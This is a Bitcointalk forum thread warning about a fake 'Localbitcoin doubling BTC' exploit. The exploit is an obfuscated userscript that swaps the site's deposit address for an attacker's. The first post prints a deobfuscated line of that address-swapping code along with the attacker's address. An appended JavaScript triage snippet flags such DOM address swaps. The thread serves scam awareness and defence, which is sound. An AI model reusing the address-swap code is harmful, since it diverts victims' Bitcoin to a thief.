Title: Fake "Localbitcoin doubling BTC exploit script" scam
Post by: TryNinja on November 16, 2019, 12:30:12 AM

I'm creating this thread to warn people about this scam, which I have seen multiple times in the forum, and to serve as a reference link for a type 1 flag on the user (and future ones).

Archive of his (locked) thread: https://archive.is/flfGm

User in question (will update if others show up): Tempates134 (https://bitcointalk.org/index.php?action=profile;u=2715861) (flag (https://bitcointalk.org/index.php?action=trust;flag=985))

Small description about the scam:

The user will post the link to a PDF teaching how to use a Localbitcoin exploit (P.S.: There are variations of this scam where the user uses G2A or Bitpay) with an encoded/obfuscated JS script. Here (https://anonymousfiles.io/cJUhTJdQ/) is the PDF. And this is what the script looks like (changed a few parts of it to avoid people running it by mistake):

Code:
// ==UserScript==

It supposedly changes the timezone of the website or does other stuff (varies a lot) to make you receive your coins doubled, or receive a product you purchased (when it's about G2A or Bitpay) along with a refund. But all the script does is change the BTC deposit address on these websites to one owned by the hacker. You will send the coins thinking you are sending to the real address, to then use the exploit, but nothing will ever happen.

You can partially deobfuscate the code on https://lelinhtinh.github.io/de4js/ and see that it changes the address on Localbitcoin to "1FVj2q6x5A5CEdSR1vrEr8DWSxACxNyNos":

Code:
document[_1x0beb('0x0')]('bitcoin-address bitcoin-address-controls')[0x0]['innerHTML'] = '1FVj2q6x5A5CEdSR1vrEr8DWSxACxNyNos';

Please NEVER trust any of these random scripts, especially if it's an encoded/obfuscated JS script (as shown above). You can't know what it does, and 99% of the time it does something it shouldn't. Stay safe.

Title: Re: Fake "Localbitcoin doubling BTC exploit script" scam
Post by: DaveF on November 16, 2019, 01:50:52 AM

It's a virus:
https://www.virustotal.com/gui/url/2ba37ee91c7b05de45f1badb57a6ccd4d6a5a146920746d6590e561cf1653394/detection

I posted about it here: https://bitcointalk.org/index.php?topic=5182222.msg53088599#msg53088599

-Dave

Title: Re: Fake "Localbitcoin doubling BTC exploit script" scam
Post by: Patatas on November 16, 2019, 12:09:11 PM

Good catch! I wonder how changing the timezone can even be done by a JS script; that's totally handled on the server side. So basically what the script does is change the bitcoin address through DOM manipulation. I think as part of security on LBC's end, they should either ask to confirm the address on the next page before sending a transaction or force everyone to use 2FA.
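
An added example, not part of the thread or any poster's code: a static triage check for a deobfuscated userscript that reports hard-coded Bitcoin address literals, whether the same line writes them into the page, and whether the hex-indexed string lookup seen in the first post is present. The function names `triageUserscript` and `isBase58CheckAddress` and the regular expressions are assumptions made for this sketch; the sample input is the line quoted in the thread plus one constructed benign line.

```javascript
const crypto = require('crypto');

const B58 = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz';
const sha256 = (buf) => crypto.createHash('sha256').update(buf).digest();

// Base58Check for legacy addresses: 25 bytes = version + 20-byte hash + 4-byte checksum,
// where the checksum is the first 4 bytes of SHA256(SHA256(version + hash)).
// Simplification: leading '1' characters are not counted separately.
function isBase58CheckAddress(s) {
  let n = 0n;
  for (const ch of s) {
    const d = B58.indexOf(ch);
    if (d < 0) return false;
    n = n * 58n + BigInt(d);
  }
  const hex = n.toString(16).padStart(50, '0');
  if (hex.length !== 50) return false;
  const raw = Buffer.from(hex, 'hex');
  return sha256(sha256(raw.subarray(0, 21))).subarray(0, 4).equals(raw.subarray(21));
}

// Heuristics (assumptions of this sketch, not an exhaustive rule set).
const ADDRESS = /\b[13][1-9A-HJ-NP-Za-km-z]{25,34}\b/g;                 // legacy address shape
const DOM_SINK = /(innerHTML|innerText|textContent)['"]?\]?\s*=(?!=)/;  // assignment into the page
const HEX_LOOKUP = /\w+\(\s*['"]0x[0-9a-f]+['"]\s*\)/i;                 // e.g. _1x0beb('0x0')

function triageUserscript(source) {
  const findings = [];
  source.split('\n').forEach((line, i) => {
    for (const address of line.match(ADDRESS) || []) {
      findings.push({
        line: i + 1,
        address,
        checksumOk: isBase58CheckAddress(address), // a valid checksum means a real payable address
        writtenToDom: DOM_SINK.test(line),         // literal is being placed into the page
      });
    }
  });
  return { obfuscated: HEX_LOOKUP.test(source), findings };
}

// Sample input: the deobfuscated line quoted in the thread, plus a constructed benign line.
const SAMPLE = [
  'var label = document.title;',
  "document[_1x0beb('0x0')]('bitcoin-address bitcoin-address-controls')[0x0]['innerHTML'] = '1FVj2q6x5A5CEdSR1vrEr8DWSxACxNyNos';",
].join('\n');
console.log(JSON.stringify(triageUserscript(SAMPLE), null, 2));
```

A finding with `writtenToDom: true` in a script that has no reason to know a payment address is the pattern described in the first post: the page shows an address that did not come from the site.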